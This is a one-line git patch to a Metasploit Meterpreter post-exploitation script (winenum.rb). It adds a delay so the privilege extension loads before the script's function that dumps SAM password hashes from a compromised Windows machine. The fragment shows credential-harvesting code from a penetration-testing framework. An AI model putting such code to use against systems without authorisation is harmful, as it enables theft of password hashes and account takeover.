From c546cac0291c882e23f92680a6943e02e86045da Mon Sep 17 00:00:00 2001 From: Carlos Perez Date: Mon, 6 Dec 2010 13:28:07 +0000 Subject: [PATCH] give priv extension enough time to load git-svn-id: file:///home/svn/framework3/trunk@11232 4d416f70-5f16-0410-b530-b9f4589650da --- scripts/meterpreter/winenum.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/scripts/meterpreter/winenum.rb b/scripts/meterpreter/winenum.rb index 67ff3c51f1..fe992d6ac7 100644 --- a/scripts/meterpreter/winenum.rb +++ b/scripts/meterpreter/winenum.rb @@ -321,6 +321,7 @@ def gethash() begin hash = '' @client.core.use("priv") + select(nil, nil, nil, 3) hashes = @client.priv.sam_hashes hashes.each do |h| hash << h.to_s+"\n"